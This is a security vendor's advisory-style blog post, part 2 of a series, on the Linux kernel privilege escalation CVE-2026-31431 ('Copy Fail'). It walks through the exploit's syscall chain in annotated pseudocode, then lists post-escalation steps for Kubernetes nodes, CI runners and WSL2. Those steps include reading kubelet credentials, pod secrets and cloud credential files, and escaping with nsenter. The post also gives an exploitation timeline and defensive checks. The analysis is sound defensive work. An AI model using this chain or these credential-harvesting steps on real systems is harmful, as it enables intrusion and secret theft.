SecPod

CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

Jun 24, 2026
CVE-2026-31431 Copy Fail | Part 2 of 4 - The 732-Byte Root

CVE-2026-31431 Copy Fail - The 732-Byte Root: Exploit Mechanics, Syscall Chain, and Multi-Environment Blast Radius

May 2026 | HIGH, CVSS 7.8 | Active Exploitation Confirmed | CISA KEV - May 1, 2026 | Part 2 of 4

Part 1 established what Copy Fail is and where the root cause lives. Part 2 goes deeper into the mechanics: how 40 iterations of a 4-byte scratch write translate into a root shell, why the page cache is the perfect write target, how the exploit degrades gracefully across different kernel configurations, and what happens when it runs inside containers, Kubernetes worker nodes, and WSL2. This part also covers the active exploitation timeline and what threat actor activity has looked like since April 29, 2026.

Exploit Payload: 732 bytes. Python stdlib only, no third-party packages, no compilation.
Page Cache Writes: ~40 iterations. Each writes 4 bytes into the target setuid binary's page cache.
Disk Footprint: Zero bytes. The target binary on disk is never modified or opened for write.
Time to Root: < 5 seconds. From unprivileged shell to root shell, with no timing dependency.
Disclosure to KEV: 2 days. Public disclosure on April 29, 2026; CISA KEV listing on May 1, 2026.

The Complete Syscall Chain - Every Step Explained

The exploit is not a single syscall doing something forbidden. It is a legal sequence of operations on legitimate kernel interfaces, each individually permitted for unprivileged users, that together abuse a memory aliasing bug in one specific AEAD algorithm implementation. Walking through the steps one at a time shows what detection opportunities exist and why they are limited.

Phase 1 - Establishing the Crypto Socket

# socket() with AF_ALG (family 38) is permitted for any user
# SOCK_SEQPACKET=5 provides message-oriented, ordered delivery
fd = socket(AF_ALG=38, SOCK_SEQPACKET=5, 0)

# Bind to the authencesn AEAD construction
# authencesn = authenticated encryption with sequence numbers
# Full string: authencesn(hmac(sha256),cbc(aes))
# This is the specific algorithm where req->dst is used as scratch mid-operation
# Field names follow struct sockaddr_alg from <linux/if_alg.h>
bind(fd, {
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))",
    .salg_feat   = 0,
    .salg_mask   = 0
})

# setsockopt with SOL_ALG (279) to set key material and the AEAD tag size
# (the IV is supplied later, per operation, in the sendmsg control message)
# Key bytes are not security-sensitive here - they're attacker-controlled
# and do not need to be any particular value for the scratch write to occur
setsockopt(fd, SOL_ALG=279, ALG_SET_KEY, key_bytes, key_len)
setsockopt(fd, SOL_ALG=279, ALG_SET_AEAD_AUTHSIZE, NULL, authsize)

# accept() produces the operation file descriptor
# All actual crypto work happens on op_fd, not on fd
op_fd = accept(fd, NULL, NULL)

Why these calls succeed for unprivileged users: AF_ALG is the kernel's documented userspace interface to its crypto API, and the kernel intentionally allows any process to use it. No capability check gates socket(AF_ALG, ...), bind(), or setsockopt(SOL_ALG, ...). This is by design. The bug is not in the access control - it is in what happens when a legitimate interface is used with a specific algorithm.

Phase 2 - Preparing the Target File Descriptor

# Open the target setuid binary read-only
# Any setuid binary works. /usr/bin/su is the canonical target.
# O_RDONLY only - no write permission required or used
suid_fd = open("/usr/bin/su", O_RDONLY)

# At this point the kernel has already populated page cache for /usr/bin/su
# from the last read. The page cache entries are marked as read-only
# from a permissions standpoint, but the AEAD operation will bypass this
# by going through the crypto subsystem's internal scatterlist, not through
# normal VFS write paths (which would check permissions).

# fstat to retrieve file size and calculate target page offsets
fstat(suid_fd, &stat_buf)
    file_size = stat_buf.st_size
    target_pages = ceil(file_size / PAGE_SIZE)
    payload_offsets = compute_offsets(target_pages)  # where to land the 4-byte writes

The permission bypass: The VFS layer enforces write permission checks through the normal file write path. splice() into an AF_ALG operation file descriptor does not go through the VFS write path. The pages are transferred as a scatterlist directly into the crypto request structure. When the AEAD operation then writes to req->dst - which, because of the 2017 optimization bug, aliases req->src - it is writing through the crypto subsystem's own memory path, not through VFS. The kernel does not re-check write permissions on page cache entries modified this way.
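
The page arithmetic in the Phase 2 listing can be sketched in Python. This is a minimal illustration of how `ceil(file_size / PAGE_SIZE)` evaluates, not the exploit's own code: `pages_spanned` and `pages_for_path` are hypothetical helper names, and the sketch only reads file metadata.

```python
import mmap
import os

PAGE_SIZE = mmap.PAGESIZE  # commonly 4096 on x86-64; taken from the running system


def pages_spanned(file_size: int, page_size: int = PAGE_SIZE) -> int:
    """Number of page cache pages needed to hold file_size bytes."""
    # Integer ceiling division, avoiding floating point rounding.
    return -(-file_size // page_size)


def pages_for_path(path: str) -> int:
    """Page count for an existing file, using only its stat() metadata."""
    return pages_spanned(os.stat(path).st_size)
```

A file of 4097 bytes spans two 4096-byte pages, which is why the listing rounds up rather than truncating.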

Phase 3 - The Core Loop: 40 Iterations of 4-Byte Corruption

# The exploit iterates ~40 times
# Each iteration targets a different byte offset within /usr/bin/su's page cache
# Each iteration performs exactly one AEAD operation that produces one 4-byte scratch write

for offset in payload_offsets:    # ~40 target locations within the binary

    # Seek to the target offset in the setuid binary
    lseek(suid_fd, offset, SEEK_SET)

    # splice() the page cache page at this offset directly into op_fd
    # count = PAGE_SIZE ensures one full page is spliced
    # No userspace buffer is involved - pure kernel-to-kernel transfer
    splice(suid_fd, NULL, op_fd, NULL, PAGE_SIZE, 0)
    
        └── kernel maps /usr/bin/su page cache page into the AEAD request's src scatterlist
            because of commit 72548b093ee3, src == dst, so the same page
            is simultaneously the input AND the output of the crypto operation

    # sendmsg triggers the actual crypto operation
    # The IV is crafted to position the authencesn scratch write
    # at the correct byte offset within the page cache page
    sendmsg(op_fd, &msg, 0)
    
        └── authencesn begins processing: reads from req->src
            partway through, authencesn writes intermediate MAC state into req->dst
            req->dst == req->src == page cache of /usr/bin/su at offset
            4 bytes of attacker-influenced data written into kernel page cache
            the page is now modified in memory but not marked dirty; the disk file is unchanged

    # recvmsg drains the output - required to reset op_fd for next iteration
    recvmsg(op_fd, &msg, 0)

# After ~40 iterations: sufficient page cache corruption to redirect execution
# The corrupted bytes replace specific instruction bytes within the binary's
# .text section as mapped in page cache, causing /usr/bin/su to exec a shell
# instead of performing its normal authentication flow

Phase 4 - Detonation

# Close the AF_ALG file descriptors - no longer needed
close(op_fd)
close(fd)

# Execute the corrupted in-memory setuid binary
# Because it is setuid root, the kernel executes it as UID 0
# Because its .text segment has been patched in page cache,
# it executes the attacker's payload instead of its normal code
execve("/usr/bin/su", ["/usr/bin/su"], envp)

    Result: root shell (UID 0, GID 0)
    Time from exploit start to root: under 5 seconds
    Disk: /usr/bin/su unchanged, sha256sum matches expected value
    Disk: no new files written, no modules loaded, no temp files

Why exactly 4 bytes: The attacker does not control the width of the authencesn scratch write. It is a fixed artifact of how the algorithm writes its intermediate MAC state into the destination buffer. What the attacker controls is where each 4-byte write lands, by controlling the IV and the offset passed to lseek() before each splice(). Delivering the complete payload requires enough iterations to overwrite the specific instruction bytes in the target binary that, when replaced, redirect execution to spawn a shell.

Page Cache Mechanics - Why This Is the Perfect Write Target

The Linux page cache is the kernel's primary mechanism for caching file-backed memory. When any process reads a regular file, the kernel populates page cache entries from disk and serves all subsequent reads from those cached pages, avoiding repeated disk I/O. The page cache is global and shared: when process A reads /usr/bin/su and process B later reads /usr/bin/su, they share the same page cache entries. There is exactly one copy of each file page in the kernel's memory at any given time.

This architecture has two consequences that Copy Fail exploits directly:

Consequence 1
One corruption affects every process

When the exploit writes into the page cache of /usr/bin/su, that modification is immediately visible to all processes on the system that subsequently execute /usr/bin/su. The corruption is not scoped to the attacker's process. Any process on the system - including ones running as root - that executes the targeted binary after corruption will run the modified in-memory version.

Consequence 2
The modification persists until eviction

Page cache entries are not automatically flushed back to disk unless they are marked dirty through a write path that goes through the VFS dirty-page mechanism. The AEAD scratch write does not set the page dirty flag through the normal VFS path - it writes directly through the crypto subsystem. The corrupted page may persist in cache indefinitely until memory pressure forces eviction or the system reboots.
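
Because the text above describes the corrupted page as not marked dirty, one way to picture "persists until eviction" is to ask the kernel to drop a file's cached pages so the next read comes from disk. The sketch below uses `os.posix_fadvise` with `POSIX_FADV_DONTNEED`, which is a real but purely advisory call. Whether it actually evicts a page modified through the path described here is an assumption, not something the article confirms, and `drop_cached_pages` is a hypothetical helper name.

```python
import os


def drop_cached_pages(path: str) -> bool:
    """Advise the kernel to discard cached pages for path.

    Returns True if the advice was issued, False if the platform
    does not expose posix_fadvise. The kernel may ignore the hint,
    for example for pages that are currently mapped.
    """
    if not hasattr(os, "posix_fadvise"):
        return False
    fd = os.open(path, os.O_RDONLY)
    try:
        # offset=0, length=0 means "the whole file"
        os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)
    return True
```

This is only a hint to the kernel and does not replace patching; it illustrates that the in-memory copy and the on-disk copy are separate objects.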

Why the Write Does Not Trigger Normal Write-Protection

When userspace opens a file with O_RDONLY and attempts a normal write, the VFS layer checks permissions and rejects it. The AF_ALG pathway completely bypasses this check because the write does not originate from a VFS write call. The sequence is:

  1. splice() transfers the page cache page into the crypto request's scatterlist without going through any write-side VFS hook
  2. The authencesn algorithm writes its scratch data into req->dst through the crypto subsystem's own memory access path
  3. Because req->dst aliases the page cache page (via the 2017 optimization), the write lands there directly
  4. The kernel never invokes any VFS write path, so no permission check, no inode dirty marking through the normal path, and no filesystem journal entry occurs

Copy-on-Write interaction: For private (MAP_PRIVATE) mappings of page cache pages, Linux uses copy-on-write (CoW) to give a process its own private copy of a page when that process writes to the mapping. The AF_ALG path does not interact with the CoW mechanism because it writes through the kernel's internal crypto subsystem, not through a userspace memory mapping. The write goes directly into the shared page cache entry, affecting all mappings of that page system-wide, not just the attacker's.
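
For contrast, the ordinary copy-on-write behaviour that the AF_ALG path sidesteps can be observed from userspace. The sketch below is a minimal illustration using Python's `mmap` module with `ACCESS_COPY` (a private, copy-on-write mapping). The function name and the temporary file are illustrative only.

```python
import mmap
import os
import tempfile


def private_write_leaves_file_untouched() -> bool:
    """Write through a private mapping and confirm the file is unchanged."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"original")
        path = tmp.name
    try:
        with open(path, "rb") as f:
            # ACCESS_COPY: writes go to a private copy of the page,
            # never to the shared page cache entry or the file.
            with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_COPY) as m:
                m[0:8] = b"modified"
                seen_in_mapping = bytes(m[0:8])
        with open(path, "rb") as f:
            seen_in_file = f.read()
        return seen_in_mapping == b"modified" and seen_in_file == b"original"
    finally:
        os.unlink(path)
```

The write is visible only inside the mapping that made it. The behaviour described in this article is the opposite: the shared page itself changes, so every reader and every mapping sees the new bytes.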

What Gets Written and How the Payload Is Structured

The attacker cannot write arbitrary bytes at arbitrary offsets in a single operation. Each iteration delivers exactly 4 bytes at one offset. The payload must therefore be structured such that the target binary's behavior is redirected by the union of approximately 40 such 4-byte patches applied to its in-memory .text segment.
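
The size budget implied by these numbers is simple arithmetic, sketched below. The 4-byte width and the figure of roughly 40 iterations come from the text; the helper names are hypothetical, and the calculation assumes the patches do not overlap.

```python
WRITE_WIDTH = 4  # bytes delivered per iteration, per the article


def bytes_delivered(iterations: int, width: int = WRITE_WIDTH) -> int:
    """Total bytes patched, assuming no two writes overlap."""
    return iterations * width


def iterations_needed(payload_bytes: int, width: int = WRITE_WIDTH) -> int:
    """Iterations required to cover payload_bytes (ceiling division)."""
    return -(-payload_bytes // width)


total = bytes_delivered(40)  # 160 bytes across ~40 iterations
```

About 160 bytes is a small budget, which is why the payload is described as a set of targeted patches to existing instructions rather than a block of new code.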

The specific bytes written depend on the algorithm's intermediate MAC state, which is influenced by two attacker-controlled inputs: the key material, set via setsockopt(SOL_ALG, ALG_SET_KEY, ...), and the IV, supplied in the sendmsg() control message. By choosing appropriate key and IV values, the attacker selects what value lands at each target offset. The exploit selects target offsets that correspond to specific instructions in the setuid binary's compiled code - replacing a conditional branch, a function call target, or a privilege check return value - such that the aggregate mutation causes the binary to execute execve("/bin/sh", ...) with root privileges instead of its normal authentication logic.

Exploit Parameter | What the Attacker Controls | Mechanism
Target offsets | Which bytes in the setuid binary get written | lseek() before each splice()
Written values | What 4 bytes land at each offset | setsockopt(SOL_ALG, ALG_SET_KEY) and IV in sendmsg CMSG
Algorithm string | Which AEAD algorithm triggers the scratch write | bind() alg_name field
Target binary | Which setuid binary is corrupted in page cache | open() path argument
Iteration count | How many 4-byte patches are delivered | Number of splice/sendmsg/recvmsg cycles in the loop

Cross-distro portability explained: Because the exploit targets the in-memory representation of a setuid binary at the page cache level, and because the specific target binary (/usr/bin/su) ships as a compiled ELF with a predictable .text layout on each distro, the attacker precomputes the per-distro target offsets and includes them in the 732-byte script as a small lookup table. The kernel-level mechanism - the AF_ALG splice path and the authencesn scratch write - is identical on every Linux distribution, so the same syscall sequence works everywhere. Only the target offsets differ between distros, and those are static per binary version.

Container Environments - Scope, Constraints, and Escape Conditions

Copy Fail is a kernel-level vulnerability. Containers on Linux share the host kernel. There is no separate kernel per container, and no container runtime (Docker, containerd, CRI-O, podman) patches or abstracts the kernel's crypto subsystem. If the host kernel is unpatched, every container running on that host is on an unpatched kernel.

Whether Copy Fail translates from container-level code execution to host-level root depends entirely on what seccomp, AppArmor, or SELinux policies are enforced on the container workload. The attack surface has two distinct scenarios.

Scenario A - Unrestricted or Weakly Restricted Containers
Full host root achievable

If the container runtime does not apply a seccomp profile that blocks socket(AF_ALG=38, ...), and no AppArmor or SELinux policy denies AF_ALG socket creation, then Copy Fail runs from inside the container with identical mechanics to a bare host exploitation. The resulting root shell runs as UID 0 in the container namespace, with access to the underlying host filesystem via /proc/1/root, /proc/1/fd, or direct mount namespace traversal from root context.
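
Whether a given workload falls under Scenario A can be checked from inside the container by testing if an AF_ALG socket can be created at all. The sketch below is a defensive exposure probe, not part of the exploit: it creates the socket and closes it immediately. `af_alg_reachable` is a hypothetical helper name, and the fallback value 38 is the Linux constant quoted in the text.

```python
import socket

# socket.AF_ALG exists on Linux builds of Python; fall back to the
# numeric family quoted in the article where it is missing.
AF_ALG = getattr(socket, "AF_ALG", 38)


def af_alg_reachable() -> bool:
    """Return True if this process is allowed to create an AF_ALG socket."""
    try:
        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError:
        # Blocked by seccomp/LSM policy, or not supported by this kernel.
        return False
    s.close()
    return True
```

A `True` result shows only that the interface is reachable from this context. It says nothing about whether the running kernel is patched.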

Scenario B - Strict Seccomp (OpenShift Restricted-v2 SCC)
Page cache corruption possible, full escape harder

Independent testing on OpenShift 4.20 with Restricted-v2 Security Context Constraints confirmed that page cache corruption of the host's setuid binaries is achievable from within a restricted container - because the page cache is shared kernel-wide regardless of namespace. However, achieving UID 0 in the host namespace under strict SCC was not reliably accomplished in all tested configurations. The attack surface is real but not universal under maximum restriction.

Kubernetes Node Compromise Path

In a Kubernetes cluster, worker nodes run many pods sharing a single kernel. If an attacker gains code execution in any pod on a node - whether through an application vulnerability, a malicious container image, or a supply chain compromise - and the node kernel is unpatched, the Copy Fail path to host node root follows the same mechanics. The difference from a standalone Linux host is what becomes accessible after root is achieved on the node.

Phase 1 - Initial Pod Foothold
  Code execution in any pod on the target Kubernetes worker node
  (application RCE, malicious image, CI job, misconfigured RBAC, supply chain)

Phase 2 - Local Privilege Escalation via Copy Fail
  Run 732-byte Python script from within the container
  AF_ALG socket opened - no seccomp block on socket(38,...) in default profiles
  splice() /usr/bin/su page cache from host namespace into AEAD op
  authencesn scratch write corrupts host's /usr/bin/su page cache (~40 iterations)
  execve("/usr/bin/su") from container context - runs as UID 0 on node

Phase 3 - Node-Level Lateral Access
  Read /proc/1/root - access host root filesystem from container
  Read /var/lib/kubelet/pods/*/volumes/ - access secrets mounted into other pods
  Read /var/lib/kubelet/kubeconfig - obtain kubelet credentials for API server
  Read /etc/kubernetes/pki/ (control plane nodes) - cluster CA material
  nsenter -t 1 -m -u -i -n - escape to host mount namespace

Phase 4 - Cluster-Wide Impact
  Kubelet credentials allow listing and exec-ing into all pods on the node
  Node service account token (if cluster-admin bound) enables cluster-wide API access
  Secrets accessible in pod volumes exposed to any pod scheduled on this node
  Repeat across additional nodes for full cluster compromise

Multi-tenant shared kernel risk: In managed Kubernetes environments where multiple tenants or teams share worker nodes, a single compromised workload belonging to one tenant can expose secrets, credentials, and data belonging to every other tenant scheduled on the same node. This is not a hypothetical risk - it is the direct consequence of shared kernel architecture combined with an unpatched LPE.
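
Since the exposure is per node kernel, a first triage step is to inventory which kernel each worker node runs. The sketch below groups nodes by the `status.nodeInfo.kernelVersion` field from the output of `kubectl get nodes -o json`. The node names and version strings in the sample are made up for illustration, and the article does not list fixed kernel versions, so deciding which groups are patched is left to the distribution's advisory.

```python
from collections import defaultdict


def nodes_by_kernel(node_list: dict) -> dict:
    """Group node names by reported kernel version.

    node_list is the parsed JSON from `kubectl get nodes -o json`.
    """
    groups = defaultdict(list)
    for node in node_list.get("items", []):
        name = node["metadata"]["name"]
        kernel = node["status"]["nodeInfo"]["kernelVersion"]
        groups[kernel].append(name)
    return dict(groups)


# Hypothetical sample data, shaped like the kubectl output.
sample = {
    "items": [
        {"metadata": {"name": "worker-a"},
         "status": {"nodeInfo": {"kernelVersion": "6.8.0-31-generic"}}},
        {"metadata": {"name": "worker-b"},
         "status": {"nodeInfo": {"kernelVersion": "6.8.0-31-generic"}}},
        {"metadata": {"name": "worker-c"},
         "status": {"nodeInfo": {"kernelVersion": "5.15.0-105-generic"}}},
    ]
}
inventory = nodes_by_kernel(sample)
```

In practice the input would come from `json.load()` on the kubectl output. Grouping by version makes it easy to see which node pools still need a kernel update and reboot.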

CI/CD Runner Environments

Continuous integration runners - GitHub Actions, GitLab CI, Jenkins agents, CircleCI - represent a particularly high-value attack surface for Copy Fail. CI runners are designed to execute untrusted or semi-trusted code (the job definition from a repository). If a malicious dependency, a compromised workflow file, or a pull request from a malicious contributor contains Copy Fail as part of a build step, the runner kernel is compromised within seconds.

What the attacker gains on a CI runner
Secrets and signing keys

CI runners typically have environment variables injected with cloud credentials, code signing keys, artifact registry tokens, deployment secrets, and API keys. Root access on the runner makes all of these readable from the process environment or the secrets filesystem.

Artifact tampering
Build output manipulation

With root on the build runner, an attacker can modify the compiled artifact, container image, or package before it is signed and published. This converts a transient runner compromise into a persistent supply chain backdoor that ships in the next release.

Persistence across jobs
Runner agent compromise

Self-hosted CI runners that reuse the same VM or container across multiple jobs are vulnerable to persistence: root access allows modifying the runner agent binary, injecting into the job execution environment, or installing a kernel-level backdoor that survives individual job teardowns.

Windows Subsystem for Linux 2 - A Real Kernel, a Real Attack Surface

WSL2 is architecturally distinct from WSL1. Where WSL1 used a compatibility translation layer, WSL2 runs an actual Linux kernel inside a lightweight Hyper-V virtual machine. That kernel is a real Linux kernel, maintained by Microsoft, built from upstream sources. It ships with the algif_aead module present and the 2017 optimization commit included.

Any developer, data scientist, or engineer running WSL2 on a Windows 10 or Windows 11 machine prior to the May 2026 Patch Tuesday update was running an unpatched Linux kernel. The copy.fail exploit runs identically in a WSL2 shell. An attacker who obtains code execution in a WSL2 environment - through a compromised development tool, a malicious Python package, a backdoored npm module, or a malicious Jupyter notebook - can escalate to root within that WSL2 VM using the same 732-byte script that works on a bare Ubuntu server.

WSL2 exploitation scope
Root inside WSL2 VM

Copy Fail gives UID 0 within the WSL2 Linux environment. This provides access to the WSL2 filesystem, all files mounted from Windows drives under /mnt/c and similar, and any credentials or secrets stored in WSL2 home directories or accessible via WSL2 interop.

Windows host impact
Credential and file access

WSL2 mounts the Windows user's home directory and all drives. Root in WSL2 can read and write files accessible to the Windows user including .ssh private keys, browser credential stores reachable via the mounted filesystem, cloud CLI credential files (.aws/credentials, .azure/), and any file the Windows user account can access.

Patch status: Microsoft delivered the updated WSL2 kernel via the May 2026 Patch Tuesday update. Developers running WSL2 who do not apply Windows updates promptly remained exposed. The running WSL2 kernel can be checked inside the WSL2 environment with uname -r (kernel release) and uname -v (build string, including the build date) - look for a kernel build dated after April 2026.
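
The same check can be scripted. The sketch below reads the release and build strings that `uname -r` and `uname -v` report, via Python's `platform` module, and recognises a WSL2 kernel by the `microsoft` and `WSL2` markers that stock WSL2 kernels carry in their release string. That marker convention is an assumption that custom-built kernels may not follow. The article does not give the fixed version number, so the sketch does not attempt a version comparison.

```python
import platform


def is_wsl2_kernel(release: str) -> bool:
    """Heuristic: stock WSL2 kernels look like '5.15.x.y-microsoft-standard-WSL2'."""
    r = release.lower()
    return "microsoft" in r and "wsl2" in r


def running_kernel() -> tuple:
    """(release, build string) for the current kernel, as uname -r / -v report."""
    return platform.release(), platform.version()


release, build = running_kernel()
on_wsl2 = is_wsl2_kernel(release)
```

On a WSL2 host, the build string returned alongside the release is where the build date appears.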

Active Exploitation Timeline and Threat Actor Activity

Copy Fail is notable among high-severity LPEs for the speed at which the gap between disclosure and confirmed exploitation closed. The timeline from public release to CISA KEV listing is one of the shortest on record for a non-remotely-exploitable vulnerability.

Early 2026
Discovery - Theori and Xint
Researchers identify the 2017 algif_aead optimization as introducing a page cache write primitive reachable from unprivileged AF_ALG sockets. Coordinated disclosure process begins with kernel maintainers and major distribution vendors.
Apr 29, 2026
Day 0 - Public Disclosure with Simultaneous Exploit Release
copy.fail goes live with the full vulnerability writeup and the 732-byte Python exploit. Unlike most responsible disclosures, the researchers released the working exploit simultaneously with the CVE. The window between disclosure and a weaponized public exploit was zero days. Patches were not yet available for all distributions at time of release.
Apr 30, 2026
Day 1 - First Vendor Patches
AlmaLinux releases patched kernel packages - ahead of upstream RHEL. Ubuntu releases an interim mitigation: a kernel module blacklist for algif_aead via kmod. CloudLinux begins rolling out KernelCare livepatches (completed May 1-2).
May 1, 2026
Day 2 - CISA KEV Listing: Active Exploitation Confirmed
CISA adds CVE-2026-31431 to the Known Exploited Vulnerabilities catalog. KEV listing requires confirmed evidence of real-world exploitation - this is not a precautionary addition. Federal agencies under BOD 22-01 receive a mandatory patch deadline of May 15, 2026. Microsoft publishes its security blog advisory. Qualys ThreatPROTECT publishes detection signatures.
May 1-2, 2026
Days 2-3 - Broader Patch Availability
RHEL, CentOS Stream, Amazon Linux 2023, Debian, Fedora, SUSE, and Arch Linux all publish patched kernel packages within 48-72 hours of disclosure. Wiz publishes cloud-focused analysis. SafeBreach publishes cross-distro reproduction confirmation. Bugcrowd and ZENDATA SOC publish threat intelligence briefs.
May 2026 Patch Tuesday
WSL2 Kernel Patch Delivered
Microsoft delivers the updated WSL2 Linux kernel via standard Windows Update. Developers running WSL2 who applied Patch Tuesday updates received the fix. Those on delayed update schedules or managed enterprise Windows update policies that defer Patch Tuesday remained exposed.
May 15, 2026
BOD 22-01 Federal Patch Deadline
Mandatory deadline for all federal agencies to apply the kernel patch or implement an approved mitigation. Organizations outside federal scope should treat this date as a reference benchmark - any unpatched Linux system remaining past this date has been exposed to active exploitation for over two weeks with a publicly available deterministic exploit.
Late May 2026
CVE-2026-43284 (Dirty Frag) Disclosed
A related LPE in the same algif_aead module is disclosed shortly after Copy Fail - demonstrating that the security audit of the AF_ALG subsystem triggered by Copy Fail's disclosure uncovered additional issues in the same code region. Splunk publishes SIEM detection blog for both CVEs.

Exploitation Characteristics Observed in the Wild

CISA's KEV listing confirms exploitation has occurred. Based on threat intelligence from the May 2026 analysis period, the observed exploitation patterns cluster into several categories:

Exploitation Category | Target Environment | Post-Escalation Objective
Opportunistic mass exploitation | Any internet-reachable Linux hosts with SSH brute-force initial access, shared hosting environments | Credential harvesting, cryptocurrency mining, botnet enrollment
Cloud workload targeting | EC2 instances, GCE VMs, Azure Linux VMs - particularly those with IMDSv1 enabled | Instance metadata credential theft, lateral movement within cloud accounts
CI/CD pipeline targeting | Self-hosted GitHub Actions runners, Jenkins agents, GitLab CI runners | Secret exfiltration, artifact tampering, persistent supply chain access
Kubernetes node targeting | Worker nodes in multi-tenant clusters, managed Kubernetes (EKS, GKE, AKS) with unpatched node images | Kubelet credential theft, cross-namespace secret access, node-level persistence
Ransomware pre-positioning | Enterprise Linux servers with domain or cloud credentials accessible after root escalation | Credential staging, data exfiltration prior to encryption, lateral movement setup

No specific APT attribution as of publication date: While CISA has confirmed exploitation, no specific advanced persistent threat group or named ransomware operation has been publicly attributed to Copy Fail campaigns as of the writing of this article. The exploitation profile as observed matches broad opportunistic activity consistent with initial access brokers and unaffiliated financially-motivated actors. This attribution gap may narrow as incident response data from the May 2026 exploitation wave is analyzed and shared.

Time-to-Exploit Analysis - Why Zero Days Between Disclosure and Weaponization Matters

Most vulnerability disclosures follow a pattern where a window exists between the CVE being published and a working exploit appearing publicly. That window - even if it lasts only 24-48 hours - gives defenders time to triage, prioritize, and push patches before exploitation begins. Copy Fail eliminated this window entirely.

Metric | Value | Risk Interpretation
Disclosure to public exploit | 0 days | Simultaneous release - no triage window for defenders
Disclosure to confirmed wild exploitation | 2 days | Immediate - KEV listing on May 1 proves real attacks began within 48 hours
Disclosure to first vendor patches | 1 day | AlmaLinux patched April 30; most distros within 48-72 hours
Patch-to-exploitation gap | Negative | Exploitation began before patches were universally available
Vulnerability lifetime before disclosure | ~9 years | Maximum possible silent exploitation window if discovered earlier by threat actors
Exploit reliability affecting response urgency | Deterministic | No false-start exploitation attempts - every attempt succeeds on unpatched systems

The patch lag problem at scale: Even when patches are available within 24-48 hours, enterprise patch deployment cycles rarely operate at that speed. Organizations running ITIL-based change management, requiring change advisory board approval for kernel updates, or operating in environments where kernel reboots require maintenance windows, were exposed to active exploitation for days or weeks after patches became available. The combination of a deterministic public exploit, zero triage window, and slow enterprise patch cycles is what makes Copy Fail a high-impact event beyond its CVSS 7.8 base score.
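
The day counts in the table follow directly from the timeline dates given earlier in this article. A minimal sketch of the arithmetic is below; the constant and function names are illustrative.

```python
from datetime import date

# Dates as stated in the timeline above.
DISCLOSURE = date(2026, 4, 29)    # public disclosure and exploit release
FIRST_PATCH = date(2026, 4, 30)   # first vendor patch (AlmaLinux)
KEV_LISTING = date(2026, 5, 1)    # CISA KEV listing
BOD_DEADLINE = date(2026, 5, 15)  # BOD 22-01 federal deadline


def days_after_disclosure(event: date) -> int:
    """Whole days between public disclosure and the given event."""
    return (event - DISCLOSURE).days


first_patch_gap = days_after_disclosure(FIRST_PATCH)
kev_gap = days_after_disclosure(KEV_LISTING)
deadline_gap = days_after_disclosure(BOD_DEADLINE)
```

The same function applied to an organization's own patch date gives its exposure window in days, which is the figure the patch lag discussion above is concerned with.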

What Is Coming in This Series

Part 1 - Nine Years in the Dark: Root cause commit, AF_ALG socket mechanics, page cache corruption, FIM blindness, affected distributions
Part 2 (this article) - The 732-Byte Root: Complete syscall chain, page cache write mechanics, container escape, Kubernetes blast radius, WSL2, active exploitation timeline
Part 3 - Finding the Footprint: auditd rules, eBPF monitoring, Wazuh SIEM correlation, behavioral IOC taxonomy, YARA memory strings, full MITRE ATT&CK mapping
Part 4 - Closing the Door: Per-distro patch verification, algif_aead blacklist procedure, seccomp and AppArmor controls, Kubernetes hardening, vulnerability chaining